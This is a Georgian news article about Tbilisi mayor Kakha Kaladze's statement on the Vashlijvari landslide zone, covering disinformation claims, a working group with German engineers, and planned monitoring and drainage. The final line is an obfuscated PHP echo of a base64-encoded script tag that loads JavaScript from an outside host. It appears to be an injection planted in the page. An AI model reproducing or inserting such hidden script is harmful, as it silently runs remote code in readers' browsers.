celsiusi
ავერსი შნაიდერი
დედაქალაქის მერის, კახა კალაძის განცხადებით, ვაშლიჯვარში, მაჭავარიანის ქუჩის მიმდებარედ არსებულ მეწყრულ ზონაში უსაფრთხოების ზომები მაქსიმალურად არის გაძლიერებული.
 
როგორც მან თბილისის მუნიციპალიტეტის მთავრობის სხდომაზე აღნიშნა, კონკრეტული მედიასაშუალებები მიზანმიმართულად ავრცელებენ დეზინფორმაციას და მოსახლეობაში პანიკას თესავენ.
 
„მინდა კიდევ ერთხელ გამოვეხმაურო ვაშლიჯვრის მიმდებარე ტერიტორიაზე არსებულ მეწყერს. სამწუხაროდ, უნდა აღვნიშნო, რომ ბოლო დღეების განმავლობაში, კონკრეტულ მედიასაშუალებებში მიზანმიმართულად ხდება დეზინფორმაციის გავრცელება და პანიკის დათესვა. პირველ რიგში, იყო საუბარი იმაზე, თითქოს, დედაქალაქის მერიამ დამალა ეს პრობლემა ან პირიქით, არც იცოდა ამის შესახებ. ჩვენ ვსაუბრობთ პრობლემაზე, რომელიც დედაქალაქში რამდენიმე ათეული წელია არსებობს. რა თქმა უნდა, ჩვენც ვიცოდით ამის შესახებ და მეტიც, ეს ყველაფერი ოფიციალურ ვებგვერდზე - www.tas.ge-ზე ატვირთული იყო. ნებისმიერ ადამიანს ჰქონდა შესაძლებლობა, ენახა ინფორმაცია ყველა იმ პრობლემურ ადგილთან დაკავშირებით, რომელიც ქალაქში გვაქვს. ეს არ ეხება მხოლოდ და მხოლოდ ვაშლიჯვრის მიმდებარე ტერიტორიას. სამწუხაროდ, თბილისში მსგავსი მეწყერსაშიში ადგილები კიდევ გვაქვს, რომლებიც ჩვენ მიერ ოფიციალურად გამოქვეყნებულია. სამუშაოების ფარგლებში, ყოველდღიურად ვაკვირდებოდით არსებულ ფერდს და როცა გაჩნდა იმის საშიშროება, რომ პრობლემები შეიძლებოდა შექმნილიყო, მოძრაობა მაშინვე ორმხრივად ჩაიკეტა. ამასთან დაკავშირებით საზოგადოებას წერილობითაც ვაცნობეთ“, - აღნიშნა თბილისის მერმა.
 
კახა კალაძემ მერის მოადგილე ირაკლი ბენდელიანს დაავალა, რომ სამუშაო ჯგუფის საქმიანობაში ჩართოს ის პირები, რომლებიც დედაქალაქში მეწყერსაშიში ზონების თემაზე მუშაობენ და სურთ, პროცესებში მონაწილეობა მიიღონ. 
 
„რა თქმა უნდა, პირველივე დღიდან შევქმენით სამუშაო ჯგუფი და ამ პროცესებში ჩავრთეთ გარემოს ეროვნული სააგენტოს, საგანგებო სიტუაციების მართვის სამსახურის, სამხარაულის ექსპერტიზის ეროვნული ბიუროს წარმომადგენლები, ასევე, დარგის სპეციალისტები. მათ ორი დღეა დაემატნენ გერმანელი სპეციალისტები. ეს ადამიანები მუშაობდნენ წყნეთი-ახალდაბას მეწყრული გზის აღდგენაზე და ასევე, შეშელიძის ქუჩაზე, სადაც სერიოზული პრობლემა იდგა და ადგილობრივი მოსახლეობისთვის ძალიან დიდ საფრთხეს წარმოადგენდა. ვიცი, რომ არიან გარკვეული დაინტერესებული ჯგუფები, ექსპერტები, ვინც ქალაქში მსგავს ტერიტორიებს სწავლობენ და ბევრი ინფორმაცია აქვთ. მინდა, ჩემს მოადგილე ირაკლი ბენდელიანს დავავალო, რომ ეს ადამიანები ჩართოთ სამუშაო ჯგუფში და ერთობლივი ძალებით, რაც შეიძლება სწრაფად მოვაგვაროთ კონკრეტული პრობლემა“, - განაცხადა კახა კალაძემ.
 
რაც შეეხება მიმდინარე სამუშაოებს, დედაქალაქის მერის თქმით, პრობლემის მოგვარების მიზნით, რამდენიმე მნიშვნელოვანი გადაწყვეტილება იქნა მიღებული. მათ შორის, დამონტაჟდება სპეციალური მონიტორინგის სისტემა. ასევე, გერმანელი ინჟინერ-გეოლოგები მუნიციპალიტეტს სთავაზობენ, რომ მონიტორინგთან ერთად, განხორციელდეს გამაგრების სამუშაოები და დრენაჟი. 
 
„ამ ეტაპზე, სამუშაო ჯგუფი განაგრძობს კვლევა-პროექტირებას ჩვენ მიერ მოწვეულ გერმანელ სპეციალისტებთან ერთად. მათ დადებითად შეაფასეს უსაფრთხოების ზომებთან დაკავშირებით გადადგმული ნაბიჯები, რომ მოძრაობა ჩაიკეტა ორმხრივად და სამუშაოები შეჩერებულია. ამასთან, იქნა კიდევ ერთი მნიშვნელოვანი გადაწყვეტილება მიღებული, რომ უნდა დამონტაჟდეს სპეციალური მონიტორინგის სისტემა, რაც მოგვცემს საშუალებას, არ გამოგვრჩეს არავითარი ცვლილება. გარდა ამისა, გერმანელი ინჟინერ-გეოლოგები გვთავაზობენ, რომ მონიტორინგთან ერთად განხორციელდეს გამაგრების სამუშაოები და დრენაჟი. უფრო მეტად დაკონკრეტდება მისაღები ზომები კვირის ბოლოსკენ, როცა უკვე გვექნება სამუშაო ჯგუფის მიერ განხორციელებული კვლევის პირველადი მონაცემები. 
 
სიტუაციას ვაკონტროლებთ, ყოველდღიურად ვაკვირდებით მიმდინარე მოვლენებს. მოსახლეობას არანაირი პანიკის საფუძველი არ აქვს. თუ რაიმე იქნება, პირველ რიგში ჩვენ მივაწოდებთ მოსახლეობას სრულყოფილ ინფორმაციას. მოვუწოდებ ყველა მედიასაშუალებას, ექსპერტს, რომ არ გაავრცელონ არასწორი ინფორმაცია. ჩვენ მაქსიმალურად გავაძლიერეთ უსაფრთხოება და ვცდილობთ, იქ არ შევუშვათ მოქალაქეები. ძალიან ბევრი ადამიანი ადის, ნახულობს და მერე ჩამოაქვთ არასწორი ინფორმაცია, აქვთ მცდელობა პანიკა დათესონ. თუ მათ რეალურად გული შესტკივათ არსებულ მდგომარეობაზე, ჩვენი კარი ღიაა და შეუძლიათ, სამუშაო ჯგუფში ჩაერთონ“, - აღნიშნა დედაქალაქის მერმა.
 
კახა კალაძის თქმით, აღნიშნული მეწყერსაშიში ზონის მიმდებარედ, საცხოვრებელი კორპუსების მშენებლობის არანაირი სამუშაო არ განხორციელებულა და არც მომავალშია დაგეგმილი.   
 
 
1370
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");